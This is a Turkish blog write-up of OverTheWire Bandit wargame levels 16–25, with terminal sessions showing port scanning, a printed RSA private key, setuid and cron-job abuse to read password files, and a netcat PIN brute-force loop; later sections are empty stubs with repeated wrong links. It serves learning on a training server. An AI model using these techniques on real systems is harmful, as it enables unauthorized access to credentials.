---
title: "OverTheWire: Wargames — Bandit Writeup [2. Kısım]"
date: 2023-06-03T09:00:00Z
summary: Bandit wargame tamamen yeni başlayanlara yöneliktir. Diğer wargame'leri oynayabilmek için gereken temel bilgileri öğretecek şekilde hazırlanmıştır. Bu yazıda oyundaki alternatif çözüm yollarını keşfedebilirsiniz.
draft: false
toc: true
type: post
author: Kaptan
categories:
  - OverTheWire
tags:
  - ctf
  - linux
  - siber-güvenlik
---

## Bandit Level 16 → Level 17

http://overthewire.org/wargames/bandit/bandit17.html

İpucuda da söylendiği gibi, hangi ana bilgisayarın SSL çalıştırdığını bulmamız gerekiyor. Bunu yapmak için, 31000'den 32000'e kadar her port'u kontrol ettim. 'openssl' ile teker teker hepsini kontrol ettim ve '31790' portunun bize RSA key verdiğini gördüm.

```r
bandit16@bandit:~$ nmap -p 31000-32000 localhost
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-24 18:32 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00014s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown

bandit16@bandit:~$ openssl s_client -connect localhost:31790
...
---
read R BLOCK
JQttfApK4SeyHwDlI9SXGR50qclOAil1
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----
```

Bu RSA key'i rsa_key adında bir dosyaya kaydettim. Daha sonra bağlantı sağlamak için izinlerini değiştirdim. Ardından ssh ile bağlantı sağladım.

```r
kaptan@mqs ~ % nano rsa_key
kaptan@mqs ~ % chmod 600 rsa_key
kaptan@mqs ~ % ssh -i rsa_key bandit17@bandit.labs.overthewire.org -p 2220
bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
VwOSWtCA7lRKkTfbr2IDh6awj9RNZM5e
```

**Kullanıcı adı:** `bandit17`

**Şifre:** `VwOSWtCA7lRKkTfbr2IDh6awj9RNZM5e`

## Bandit Level 17 → Level 18

http://overthewire.org/wargames/bandit/bandit18.html

Bu level'da dosya karşılaştırmaya yarayan 'diff' adında uygulamayı kullanarak yapılan değişikliği hemen görebiliyoruz. Verilen şifrelerden ilki çalışıyor. Ancak söylenildiği gibi giriş yaptığımızda 'Byebye!' uyarısını alıyoruz. Devamı bir sonraki levelda.

```r
bandit17@bandit:~$ diff passwords.new passwords.old
< hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
---
> glZreTEH1V3cGKL6g4conYqZqaEj0mte
kaptan@mqs ~ % ssh bandit18@bandit.labs.overthewire.org -p 2220
...
Byebye !
Connection to bandit.labs.overthewire.org closed.
```

**Kullanıcı adı:** `bandit18`

**Şifre:** `hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg`

## Bandit Level 18 → Level 19

http://overthewire.org/wargames/bandit/bandit19.html

Bir önceki levelda açıkladığım gibi makineye giriş yapar yapmaz "Byebye!" çıktısını aldım ve hemen makine bağlantım kesildi. Bu durumu nasıl çözebileceğim konusunda uzun araştırmalar neticesinde ssh'da '-T' parametresinin işe yaradığını buldum(ref).

```r
kaptan@mqs ~ % ssh bandit18@bandit.labs.overthewire.org -p 2220 -T
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password: 
ls
readme
cat readme
awhqfNnAbc1naukrpqDYcF95h7HoMTrC
```

**Kullanıcı adı:** `bandit19`

**Şifre:** `awhqfNnAbc1naukrpqDYcF95h7HoMTrC`

Referanslar: 
- http://man.openbsd.org/ssh#T
- https://stackoverflow.com/questions/7114990/pseudo-terminal-will-not-be-allocated-because-stdin-is-not-a-terminal

## Bandit Level 19 → Level 20

http://overthewire.org/wargames/bandit/bandit20.html

Level'da söylenildiği üzere setuid binary'sini ana dizinde kullanmalıyız. Peki setuid ne demek: Setuid, bir kullanıcının bir dosyayı veya programı, o dosyanın sahibinin izniyle çalıştırmasına izin veren bir ayardır. İzinleri kontrol ettiğimizde bandit19'un gruptan olduğunu görüyorum. Böylece bandit19 üzerinden bandit20 için kod çalıştırabiliyorum.

```r
bandit19@bandit:~$ ./bandit20-do cat '/etc/bandit_pass/bandit20'
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
bandit19@bandit:~$ file *
bandit20-do: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked,
interpreter /lib/ld-linux.so.2, BuildID[sha1]=c148b21f7eb7e816998f07490c8007567e51953f, for GNU/Linux 3.2.0, not stripped
bandit19@bandit:~$ ./bandit20-do 
Run a command as another user.
Example: ./bandit20-do id
bandit19@bandit:~$ ls -al bandit20-do
-rwsr-x--- 1 bandit20 bandit19 14876 Apr 23 18:04 bandit20-do
bandit19@bandit:~$ ./bandit20-do cat '/etc/bandit_pass/bandit20'
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
```

**Kullanıcı adı:** `bandit20`

**Şifre:** `VxCazJaVykI6W36BkBU0mJTCM8rR95XT`

## Bandit Level 20 → Level 21

http://overthewire.org/wargames/bandit/bandit21.html

Bu levelda "suconnect" adında çalıştırılabilir bir dosya var. Bu dosya localhost'ta belirli bir port'tan TCP bağlantısı kurmamızı amaçlıyor. Ayrıca diğer taraftan doğru bir şifre alırsa, bir sonraki şifreyi çıktı olarak veriyor. İki terminal açmak yerine arkaplanda işlem yapıcak şekilde bandit20 kullanıcısının şifresini localhost'a gönderdim. Sonrasında 'suconnect' dosyasını çalıştırdım ve böylece diğer şifrenin çıktısını aldım.

```r
bandit20@bandit:~$ ls
suconnect
bandit20@bandit:~$ file *
suconnect: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked,
interpreter /lib/ld-linux.so.2, BuildID[sha1]=67d1a01f06a6ae6a42184cc8cf912967cecf72da, for GNU/Linux 3.2.0, not stripped
bandit20@bandit:~$ strings suconnect
...
Usage: %s <portnumber>
This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side,
the next password is transmitted back.
ERROR: Invalid portnumber
localhost
getaddrinfo: %s
Could not connect
ERROR: Can't read from socket
Read: %s
/home/bandit21/.prevpass
Password matches, sending next password
/etc/bandit_pass/bandit21
ERROR: This doesn't match the current password!
FAIL
bandit20@bandit:~$ echo -n "VxCazJaVykI6W36BkBU0mJTCM8rR95XT" | nc -lvnp localhost -p 1234 &
[1] 1234511
bandit20@bandit:~$ Listening on 0.0.0.0 1234
./suconnect 1234
Connection received on 127.0.0.1 46136
Read: VxCazJaVykI6W36BkBU0mJTCM8rR95XT
Password matches, sending next password
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
```

**Kullanıcı adı:** `bandit21`

**Şifre:** `NvEJF7oVjkddltPSrdKEFOllh9V1IBcq`

## Bandit Level 21 → Level 22

http://overthewire.org/wargames/bandit/bandit22.html

Bu levelda "/etc/cron.d/" dizininde bir cron görevi yapılandırılmış. Cron, belirli bir zaman aralığında belirli komutları çalıştıran bir programdır. Söylenilen dizine gidip oradaki dosyaları inceledim. 'cronjob_bandit22' dosyasını okuduğumda başında yıldızlar olan komutların her saat, her dakikada bir komut çalıştırdığını gördüm. Burada benim ilgimi çeken 'cronjob_bandit22.sh' dosyası oldu. Dosyayı okuduğumda ise şifreyi '/tmp' dizininde başkabir dosyaya yazdığını gördüm. Bu dosyayı okuyunca şifreye ulaştım.

```r
bandit21@bandit:~$ cd /etc/cron.d
bandit21@bandit:/etc/cron.d$ file *
cronjob_bandit15_root: ASCII text
cronjob_bandit17_root: ASCII text
cronjob_bandit22:      ASCII text
cronjob_bandit23:      ASCII text
cronjob_bandit24:      ASCII text
cronjob_bandit25_root: ASCII text
e2scrub_all:           ASCII text
otw-tmp-dir:           regular file, no read permission
sysstat:               ASCII text
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat  /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
```

**Kullanıcı adı:** `bandit22`

**Şifre:** `WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff`

## Bandit Level 22 → Level 23

http://overthewire.org/wargames/bandit/bandit23.html

Önceki levelda ki gibi, "/etc/cron.d" klasöründe bir cron görevi yapılandırması bulunuyor. 'cronjob_bandit23' dosyayısını okuduğumda her dakika çalışan bir bash betiği olduğunu gördüm. Dosyayı okuduğumda; kullanıcı adınınının "myname" değişkenine, "echo I am user $myname" komutunu, md5sum komutuna gönderiyor ve hash'i 'cut' ile yazdırılan değer için ilk kısmını "mytarget" değişkenine atıyor. Yani gerçek bir hash değeri elde ediyor. Bu hash'i(mytarget) değişkenini "/tmp/" dizinine kopyalıyor. Bu dizindeki dosyayı okuduğumuzda şifreye ulaşıyoruz.

```r
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ file *
cronjob_bandit15_root: ASCII text
cronjob_bandit17_root: ASCII text
cronjob_bandit22:      ASCII text
cronjob_bandit23:      ASCII text
cronjob_bandit24:      ASCII text
cronjob_bandit25_root: ASCII text
e2scrub_all:           ASCII text
otw-tmp-dir:           regular file, no read permission
sysstat:               ASCII text
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
```

**Kullanıcı adı:** `bandit23`

**Şifre:** `QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G`

## Bandit Level 23 → Level 24

http://overthewire.org/wargames/bandit/bandit24.html

"/etc/cron.d" dizininde "cronjob_bandit24" dosyasında bir cron yapılandırması mevcut. Dosyanın içinde çalıştırılan komutta; '/var/spool/$myname/foo' dizininde olan her dosyanın bir kez çalıştırılacağını ve 60 saniye sonra silineceğini görüyoruz. '/etc/bandit_pass/bandit24'ten şifreyi alıp başka bir dosyaya yazdırmak için bir '/tmp' dizinine script yazdım. Script'i '/var/spool/bandit24/foo' dizinine kopyaladım. Belli bir süre bekledikten sonra şifreyi okudum.

```r
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ file *
cronjob_bandit15_root: ASCII text
cronjob_bandit17_root: ASCII text
cronjob_bandit22:      ASCII text
cronjob_bandit23:      ASCII text
cronjob_bandit24:      ASCII text
cronjob_bandit25_root: ASCII text
e2scrub_all:           ASCII text
otw-tmp-dir:           regular file, no read permission
sysstat:               ASCII text
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo || exit 1
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -rf ./$i
    fi
done

bandit23@bandit:/etc/cron.d$ mkdir /tmp/here
bandit23@bandit:/etc/cron.d$ cd /tmp/here
bandit23@bandit:/tmp/here$ touch script.sh
bandit23@bandit:/tmp/here$ nano script.sh
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/here/password
bandit23@bandit:/tmp/here$ chmod 777 script.sh
bandit23@bandit:/tmp/here$ cp script.sh /var/spool/bandit24/foo
bandit23@bandit:/tmp/here$ cat password 
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
```

**Kullanıcı adı:** `bandit24`

**Şifre:** `VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar`

## Bandit Level 24 → Level 25

http://overthewire.org/wargames/bandit/bandit25.html

Localhost üzerinde bulunan arka plan programı 30002 numaralı port'ta bir dinleme yapıyor ve 'bandit25' kullanıcısının şifresini bulmak için dinlemeye 4 haneli pin kodunu bir önceki şifre ile girmemiz isteniyor. Bu durum da 0000'den 9999'a kadar olan tüm sayıları kapsıyor demek. Ancak bu durumda 10000 farklı kombinasyonu tek tek denememiz mümkün görünmüyor. İpuçlara göre şifreye ulaşmanın tek yolu, kaba kuvvet (brute force) saldırısını kullanmaktır. Bu durumu otomatik bir hâle getirmek için küçük bir betik yazıyorum ve bu betiği çalıştırarak şifreye ulaşıyorum.

```r
bandit23@bandit:~$ for i in {0000..9999}; do echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i; done | nc localhost 30002
...
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
```

**{0000..9999}**: 0000'den 9999'a kadar olan tüm sayıları içeren bir dizi oluşturur: 0000, 0001, 0002, ..., 9999.

**for i in {0000..9999}; do**: "i" adında bir değişken tanımlar ve bu değişkene sırasıyla 0000, 0001, 0002, ..., 9999 değerlerini atar.

**echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $i;**: "VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar" metnini, döngüdeki 'i' değişkeni ile birleştirerek ekrana yazdırır.

**done**: Döngünün sonlandığını belirtir.

**| nc localhost 30002**: Önceki adımda ekrana yazdırılan çıktıyı 'netcat' ile yönlendirir. Bu komut, belirtilen IP adresi 'localhost' ve '30002' port'undan bir bağlantı kurar ve çıktıyı bu bağlantı üzerinden gönderir.

**Kullanıcı adı:** `bandit25`

**Şifre:** `p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d`

## Bandit Level 25 → Level 26

http://overthewire.org/wargames/bandit/bandit26.html



**Kullanıcı adı:** `bandit26`

**Şifre:** ``

## Bandit Level 26 → Level 27

http://overthewire.org/wargames/bandit/bandit27.html



**Kullanıcı adı:** `bandit27`

**Şifre:** ``

## Bandit Level 27 → Level 28

http://overthewire.org/wargames/bandit/bandit28.html



**Kullanıcı adı:** `bandit28`

**Şifre:** ``

## Bandit Level 28 → Level 29

http://overthewire.org/wargames/bandit/bandit29.html



**Kullanıcı adı:** `bandit29`

**Şifre:** ``

## Bandit Level 29 → Level 30

http://overthewire.org/wargames/bandit/bandit29.html



**Kullanıcı adı:** `bandit30`

**Şifre:** ``

## Bandit Level 30 → Level 31

http://overthewire.org/wargames/bandit/bandit29.html



**Kullanıcı adı:** `bandit31`

**Şifre:** ``

## Bandit Level 31 → Level 32

http://overthewire.org/wargames/bandit/bandit29.html



**Kullanıcı adı:** `bandit32`

**Şifre:** ``

## Bandit Level 32 → Level 33

http://overthewire.org/wargames/bandit/bandit29.html



**Kullanıcı adı:** `bandit33`

**Şifre:** ``



## Bandit Level 33 → Level 34

http://overthewire.org/wargames/bandit/bandit29.html



**Kullanıcı adı:** `bandit34`

**Şifre:** ``





